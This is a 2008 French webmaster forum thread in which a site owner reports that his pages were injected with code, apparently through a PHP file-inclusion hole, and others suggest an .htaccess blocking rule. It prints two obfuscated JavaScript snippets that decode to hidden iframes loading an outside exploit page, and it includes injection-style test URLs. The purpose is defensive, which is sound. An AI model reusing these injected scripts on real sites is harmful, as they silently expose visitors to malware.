|
Voir le sujet précédent :: Voir le sujet suivant
|
| Auteur |
Message |
| |
|
afrolatino
Nouveau WRInaute
Inscrit le: 27 Mai 2004
Messages: 12
|
 Posté le : Mer Fév 27, 2008 19:55 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
Depuis quelques jours j'ai fait declaration de spaM sur
http://www.spam-rbl.com
http://www.spamcop.net
https://www.signal-spam.fr
je me fait pirater mon site www.afrolatino.net par intrusion de php
en introduisant du code javascript sur Tous les fichiers index.htm index.html et index.php de tous les repertoires
voici le code qui a ete rajouté
| Code: |
<!-- ~ --><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!119!119!119!46!98!97!49!111!110!46!105!110!102!111!47!115!112!108!47!105!110!100!101!120!46!112!104!112!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT><!-- ~ --> |
et celui-ci quelque jours avant (celui-ci l'antivirus le detecte comme EXPLOIT-IFRAME)
| Code: |
<script>function v47c1628943055(v47c162894381f){ var v47c1628943feb=16;
return(parseInt(v47c162894381f,v47c1628943feb));}
function v47c1628944f8b(v47c162894575a){ function v47c1628946ec8 () {var v47c162894769a=2;
return v47c162894769a;} var v47c1628945f29='';for(v47c16289466fa=0; v47c16289466fa<v47c162894575a.length;
v47c16289466fa+=v47c1628946ec8()){ v47c1628945f29+=(String.fromCharCode(v47c1628943055(v47c162894575a.substr(v47c16289466fa, v47c1628946ec8()))));}
return v47c1628945f29;} document.write(v47c1628944f8b('3C696672616D65206E616D653D273527207372633D27687474703A2F2F6261316F6E2E696E666F2F73706C27207
7696474683D333138206865696768743D353036207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script> |
A priori cela derange les spammer de le declarer
quelle est la faille qu'ils utilisent et comment puis je les empecher?
Dernière édition par afrolatino le Jeu Fév 28, 2008 8:00; édité 4 fois |
|
| |
|
 |
Jeviensderio
WRInaute accro
Inscrit le: 29 Sep 2006
Messages: 1259
|
| Posté le : Mer Fév 27, 2008 20:57 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| Il faut voir les scripts PHP et s'ils permettent de stocker des fichiers en les appelant avec des variables en paramètres. |
|
| |
|
|
Serious
WRInaute accro
Inscrit le: 21 Nov 2005
Messages: 2437
|
| Posté le : Mer Fév 27, 2008 21:23 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| coincidence. |
|
| |
|
|
julk
WRInaute passionné
Inscrit le: 12 Mar 2004
Messages: 577
|
| Posté le : Jeu Fév 28, 2008 2:08 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
tu t'es fait hacher ton site ? 
et sérieux je sais pas pourquoi tu t'es attaqué aux span même si moi aussi je préféré les div mais les pauvre ils y sont pour rien... |
|
| |
|
|
julk
WRInaute passionné
Inscrit le: 12 Mar 2004
Messages: 577
|
| Posté le : Jeu Fév 28, 2008 2:09 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| désolé je pouvais pas me retenir |
|
| |
|
|
afrolatino
Nouveau WRInaute
Inscrit le: 27 Mai 2004
Messages: 12
|
| Posté le : Jeu Fév 28, 2008 7:32 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| Jeviensderio a écrit: |
| Il faut voir les scripts PHP et s'ils permettent de stocker des fichiers en les appelant avec des variables en paramètres. |
euh il y a la possibilite de faire de upload de fichier
maintenant est ce que c'est du GET ou du POST je ne sais pas
la strure du site et une base de IPB 1.3
tu penses que c'est de cette facon quil rajoute du code en de de fichier php
sur mon portail les page utilise des fonction include n'est pas une voie de faille
de toute facon il est certain qu'ils utilisent une faille en pârametre dans l'url
Dernière édition par afrolatino le Jeu Fév 28, 2008 7:35; édité 1 fois |
|
| |
|
|
afrolatino
Nouveau WRInaute
Inscrit le: 27 Mai 2004
Messages: 12
|
| Posté le : Jeu Fév 28, 2008 7:34 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| julk a écrit: |
| désolé je pouvais pas me retenir |
Ok j'ai corrigé le SPAN en SPAM
au fait tu verras que c'est pas vraiment marrant de se faire hacKer le Site sur lequel on bosse des heures des jours des mois et des années
mais bon je me fache pas
Pour info je recois par semaine plus 5000 mails de SPAM sur une dizaine de boite mail |
|
| |
|
|
cthierry
WRInaute accro
Inscrit le: 15 Jan 2005
Messages: 1726
Localisation: seine et marne
|
| Posté le : Jeu Fév 28, 2008 9:14 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| afrolatino a écrit: |
Pour info je recois par semaine plus 5000 mails de SPAM sur une dizaine de boite mail |
Petit joueur 
Moi c'est par jour et bon a part le promo de viagra que je regarde pour trouver le plus offrant (je rigole ) tout passe par la moulinette antispam.
Petite recrudescence de mails russes en ce moment. |
|
| |
|
|
bproductiv
WRInaute accro
Inscrit le: 27 Déc 2004
Messages: 2211
Localisation: La roche s/ yon
|
| Posté le : Jeu Fév 28, 2008 9:58 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| JAMAIS s'attaquer à plus fort que soi..ca finit mal en général |
|
| |
|
|
afrolatino
Nouveau WRInaute
Inscrit le: 27 Mai 2004
Messages: 12
|
| Posté le : Jeu Fév 28, 2008 16:01 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
Est ce qu'il y a des personnes qui ont deja utilisé les site de declaration de SPAM comme ceux-ci
http://www.spam-rbl.com
http://www.spamcop.net
https://www.signal-spam.fr
spam-rbl.com spamcop.net envoi des mails d'avertissement au propriétaire des serveurs smtp
est ce que ces mails d'avertissements comportent le mail du destinataire de l'entete du mail SPAM? (dans ce cas, la plainte n'est pas anonyme et on peut avoir des represailles) |
|
| |
|
|
bproductiv
WRInaute accro
Inscrit le: 27 Déc 2004
Messages: 2211
Localisation: La roche s/ yon
|
| Posté le : Jeu Fév 28, 2008 16:07 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
Faut vraiment avoir du temps à perdre quand même.
un spam c'est poubelle et on oublie.
Aucun moyen efficace pour lutter existe, alors faut laisser couler. |
|
| |
|
|
afrolatino
Nouveau WRInaute
Inscrit le: 27 Mai 2004
Messages: 12
|
| Posté le : Ven Fév 29, 2008 7:50 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
En moins d'une semaine j'ai eu au moins 972 attaques par injection de php
petite question technique
peut on bloquer au niveau du htaccess toute url qui contient ?=http:// |
|
| |
|
|
afrolatino
Nouveau WRInaute
Inscrit le: 27 Mai 2004
Messages: 12
|
|
| |
|
|
Leonick
WRInaute accro
Inscrit le: 08 Aoû 2004
Messages: 8651
Localisation: Val de Marne
|
| Posté le : Ven Fév 29, 2008 18:34 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| afrolatino a écrit: |
| peut on bloquer au niveau du htaccess toute url qui contient ?=http:// |
oui, avec
| Code: |
RewriteEngine on
RewriteRule (http|proxy) - [NC,F,L]
|
dans le htaccess, ça te retirera déjà une bonne partie, après, tu peux l'étoffer selon les types d'url autorisés sur ton site |
|
| |
|
|
afrolatino
Nouveau WRInaute
Inscrit le: 27 Mai 2004
Messages: 12
|
| Posté le : Dim Mar 02, 2008 1:31 Sujet du message: En s'attaquant au spaM on se fait Hacker son site |
|
|
| Leonick a écrit: |
| afrolatino a écrit: |
| peut on bloquer au niveau du htaccess toute url qui contient ?=http:// |
oui, avec
| Code: |
RewriteEngine on
RewriteRule (http|proxy) - [NC,F,L]
|
dans le htaccess, ça te retirera déjà une bonne partie, après, tu peux l'étoffer selon les types d'url autorisés sur ton site |
salut
j'ai dans mon htaccess
| Code: |
ErrorDocument 401 http://www.afrolatino.net/
ErrorDocument 402 http://www.afrolatino.net/
ErrorDocument 403 http://www.afrolatino.net/
ErrorDocument 404 http://www.afrolatino.net/
RewriteEngine on
Options +FollowSymlinks
RewriteRule (http|proxy|.txt) - [NC,F,L] |
.... (a Leonick je t'ai envoyé par mp mon .htaccess complet )
ca marche sur http://www.afrolatino.net/logattaque.txt
mais j'ai l'impression que cela ne marche pas
http://www.afrolatino.net/forum/index.php?l=http://www
http://www.afrolatino.net/forum/index.php?l=http://www.txt
Dernière édition par afrolatino le Dim Mar 02, 2008 1:37; édité 1 fois |
|
| |
|
|
| |
|
|
